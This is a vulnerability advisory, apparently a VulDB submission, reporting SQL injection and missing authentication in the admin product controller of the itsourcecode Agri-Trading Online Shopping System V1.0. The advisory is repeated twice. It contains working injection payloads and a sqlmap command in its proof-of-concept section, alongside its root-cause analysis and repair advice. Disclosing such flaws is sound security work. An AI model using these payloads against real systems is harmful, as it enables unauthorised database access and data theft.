itsourcecode Agri-Trading Online Shopping System Project V1.0 SQL Injection Vulnerability and Broken Access Control Vulnerability
NAME OF AFFECTED PRODUCT(S):
- Agri-Trading Online Shopping System Project
Vendor Homepage :
https://itsourcecode.com/free-projects/php-project/php-project-online-shopping-with-source-code/
AFFECTED AND/OR FIXED VERSION(S):
Vuldb Submitter:
Vulnerable File:
- ~admin/productcontroller.php
VERSION(S):
Vulnerability Type:
- SQL Injection
- Broken Access Control
DESCRIPTION:
- The Agri-Trading Online Shopping System Project V1.0 is vulnerable to SQL Injection and Broken Access Control within the admin/productcontroller.php file. The application fails to properly sanitize user-supplied input in the product parameter during the add action. A remote, unauthenticated attacker can exploit this by sending a specially crafted POST request to execute arbitrary SQL commands. Furthermore, the endpoint lacks session validation, allowing attackers to bypass authentication entirely. Successful exploitation could lead to unauthorized database access, sensitive data exfiltration, and unauthorized modification of product records.
SQL Injection Root Cause:
-
Vulnerability location: admin/productcontroller.php Involved functions: add (new), update (update), updatequantity (update quantity)
Description: In multiple business logic processing functions within this file, the program directly retrieves user input through the $_POST global variable and concatenates it into SQL query statements without desensitization or escaping. Due to the lack of input validation and prepared statements, attackers can construct malicious SQL payloads to disrupt the logical structure of the original SQL statements, thereby executing arbitrary commands on the target database.
-
vulnerability snippet
-
- $result = mysqli_query($db, "SELECT * FROM tblproducts WHERE product_name = '".$product."'");
- $sql = 'UPDATE tblproducts set quantity = quantity + "'.$quantity.'" WHERE product_code ="'.$id.'"';
Broken Access Control Root Cause:
-
Vulnerability location: admin/productcontroller.php Vulnerability nature: Missing Authentication
Professional description: This controller file fails to implement effective session management (Session Validation) or identity authentication checks before processing sensitive operation requests involving database addition, deletion, and modification. The system trusts all requests arriving at the interface by default, without verifying whether the requester holds valid administrator credentials. Attackers can bypass the front-end management interface and invoke backend interfaces by directly constructing HTTP POST requests, enabling illegal operations on product data.
-
vulnerability snippet:
- No verification was conducted on the cookie
Impact:
- Attackers can exploit this SQL injection vulnerability to gain unauthorized access to the database, leading to sensitive data exfiltration, data tampering, and unauthorized administrative control. Such exploits not only compromise system integrity but also risk service disruption, posing a severe threat to both system security and business continuity.
POC:
Parameter: product (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: code=1017&product=1' AND 5868=5868 AND 'PnyK'='PnyK&quantity=1&price=1&markup=1&user=2&date=2026-02-09&category=1&supplier=1&submit=
Type: error-based
Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
Payload: code=1017&product=1' AND EXTRACTVALUE(9285,CONCAT(0x5c,0x716a786b71,(SELECT (ELT(9285=9285,1))),0x7170786a71)) AND 'imeP'='imeP&quantity=1&price=1&markup=1&user=2&date=2026-02-09&category=1&supplier=1&submit=
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: code=1017&product=1' AND (SELECT 7520 FROM (SELECT(SLEEP(5)))qRDs) AND 'FwlN'='FwlN&quantity=1&price=1&markup=1&user=2&date=2026-02-09&category=1&supplier=1&submit=NO AUTHENTICATION REQUIRED:
- The combination of two vulnerabilities results in no authentication being required
The following are screenshots of some specific Managemen obtained from testing and running with the sqlmap tool:
python3 sqlmap.py -u "http://192.168.1.29:8081/TEAMBAM/admin/productcontroller.php?action=add" --data "code=1017&product=1&quantity=1&price=1&markup=1&user=2&date=2026-02-09&category=1&supplier=1&submit=" --method POST -p product --dbs
Suggested Repair
Use Prepared Statements and Parameter Binding:
Preparing statements can prevent SQL injection as they separate SQL code from user input data. When using prepared statements, the value entered by the user is treated as pure data and will not be interpreted as SQL code.
Input Validation and Filtering:
Strictly validate and filter user input data to ensure it conforms to the expected format.
Minimize Database User Permissions:
Ensure that the account used to connect to the database has the minimum necessary permissions. Avoid using accounts with advanced permissions (such as 'root' or 'admin') for daily operations.
Regular Security Audits:
Regularly conduct code and system security audits to promptly identify and fix potential security vulnerabilities.
itsourcecode Agri-Trading Online Shopping System Project V1.0 SQL Injection Vulnerability and Broken Access Control Vulnerability
NAME OF AFFECTED PRODUCT(S):
Vendor Homepage :
https://itsourcecode.com/free-projects/php-project/php-project-online-shopping-with-source-code/
AFFECTED AND/OR FIXED VERSION(S):
Vuldb Submitter:
Vulnerable File:
VERSION(S):
Vulnerability Type:
DESCRIPTION:
SQL Injection Root Cause:
Vulnerability location: admin/productcontroller.php Involved functions: add (new), update (update), updatequantity (update quantity)
Description: In multiple business logic processing functions within this file, the program directly retrieves user input through the $_POST global variable and concatenates it into SQL query statements without desensitization or escaping. Due to the lack of input validation and prepared statements, attackers can construct malicious SQL payloads to disrupt the logical structure of the original SQL statements, thereby executing arbitrary commands on the target database.
vulnerability snippet
Broken Access Control Root Cause:
Vulnerability location: admin/productcontroller.php Vulnerability nature: Missing Authentication
Professional description: This controller file fails to implement effective session management (Session Validation) or identity authentication checks before processing sensitive operation requests involving database addition, deletion, and modification. The system trusts all requests arriving at the interface by default, without verifying whether the requester holds valid administrator credentials. Attackers can bypass the front-end management interface and invoke backend interfaces by directly constructing HTTP POST requests, enabling illegal operations on product data.
vulnerability snippet:
Impact:
POC:
Parameter: product (POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: code=1017&product=1' AND 5868=5868 AND 'PnyK'='PnyK&quantity=1&price=1&markup=1&user=2&date=2026-02-09&category=1&supplier=1&submit= Type: error-based Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE) Payload: code=1017&product=1' AND EXTRACTVALUE(9285,CONCAT(0x5c,0x716a786b71,(SELECT (ELT(9285=9285,1))),0x7170786a71)) AND 'imeP'='imeP&quantity=1&price=1&markup=1&user=2&date=2026-02-09&category=1&supplier=1&submit= Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: code=1017&product=1' AND (SELECT 7520 FROM (SELECT(SLEEP(5)))qRDs) AND 'FwlN'='FwlN&quantity=1&price=1&markup=1&user=2&date=2026-02-09&category=1&supplier=1&submit=NO AUTHENTICATION REQUIRED:
The following are screenshots of some specific Managemen obtained from testing and running with the sqlmap tool:
python3 sqlmap.py -u "http://192.168.1.29:8081/TEAMBAM/admin/productcontroller.php?action=add" --data "code=1017&product=1&quantity=1&price=1&markup=1&user=2&date=2026-02-09&category=1&supplier=1&submit=" --method POST -p product --dbs
Suggested Repair
Use Prepared Statements and Parameter Binding:
Preparing statements can prevent SQL injection as they separate SQL code from user input data. When using prepared statements, the value entered by the user is treated as pure data and will not be interpreted as SQL code.
Input Validation and Filtering:
Strictly validate and filter user input data to ensure it conforms to the expected format.
Minimize Database User Permissions:
Ensure that the account used to connect to the database has the minimum necessary permissions. Avoid using accounts with advanced permissions (such as 'root' or 'admin') for daily operations.
Regular Security Audits:
Regularly conduct code and system security audits to promptly identify and fix potential security vulnerabilities.